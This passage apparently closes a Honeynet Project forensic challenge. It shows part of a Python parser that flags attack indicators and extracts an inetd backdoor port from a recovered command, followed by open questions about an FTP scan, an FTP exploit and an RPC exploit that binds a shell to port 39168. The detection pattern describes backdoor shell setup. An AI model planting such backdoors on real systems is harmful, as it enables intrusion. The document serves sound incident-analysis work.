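    hits = [name for name, pat in INDICATORS.items() if re.search(pat, cmd)]
    port = re.search(r"echo\s+(\d+)\s+stream\s+tcp", cmd)
    return {"command": cmd, "indicators": hits, "backdoor_port": int(port.group(1)) if port else None}
```

Run against the full dump, the same parser recovers the whole script (the user account lines included), since only the NUL terminator decides where the command ends.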

Attack completed. The unanswered questions are:

QUESTION 1: Can you name the FTP scanning tool that uses a half open SYN?
QUESTION 2: What does the FTP exploit achieve? Does it open a port, create
a shell, add a user?
QUESTION 3: Where in the RPC exploit code does it bind a shell
to port 39168?
QUESTION 4: Are the attacks related?

Do you have any further analysis you can add?

------- Honeynet Project, http://project.honeynet.org --------
